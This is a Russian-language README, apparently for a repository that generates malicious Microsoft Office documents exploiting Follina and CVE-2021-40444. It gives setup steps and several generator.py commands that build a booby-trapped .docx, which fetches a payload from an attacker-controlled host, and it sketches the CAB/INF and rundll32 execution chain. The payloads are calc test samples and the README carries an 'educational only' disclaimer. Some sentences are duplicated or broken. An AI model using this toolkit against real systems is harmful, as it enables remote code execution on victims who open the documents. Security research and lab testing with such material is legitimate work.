
Этот репозиторий содержит скрипты и ресурсы для эксплуатации уязвимостей Follina CVE и CVE-2021-40444 в Microsoft Office. Скрипты создают вредоносные файлы документов, которые могут выполнять произвольный код в целевой системе.
Этот репозиторий содержит скрипты и ресурсы для эксплуатации уязвимостей Follina CVE и CVE-2021-40444 в Microsoft Office. Скрипты создают вредоносные файлы документов, которые могут выполнять произвольный код на целевой системе.
requirements.txt)Настройка Flare VM:
labpasswordPython и виртуальное окружение:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv с помощью следующей команды:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Генерация эксплойта:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 на ваш IP-адрес.Доступ к сгенерированному документу:
.docx будет находиться в каталоге:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) открывается.document.xml.rels.%TEMP%Low.rundll32 выполнить боковую загрузку INF-файла.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Этот проект предназначен только для образовательных целей. Используйте его ответственно и не эксплуатируйте уязвимости на системах, которые вам не разрешено тестировать. Неправильное использование этой информации может привести к уголовной ответственности.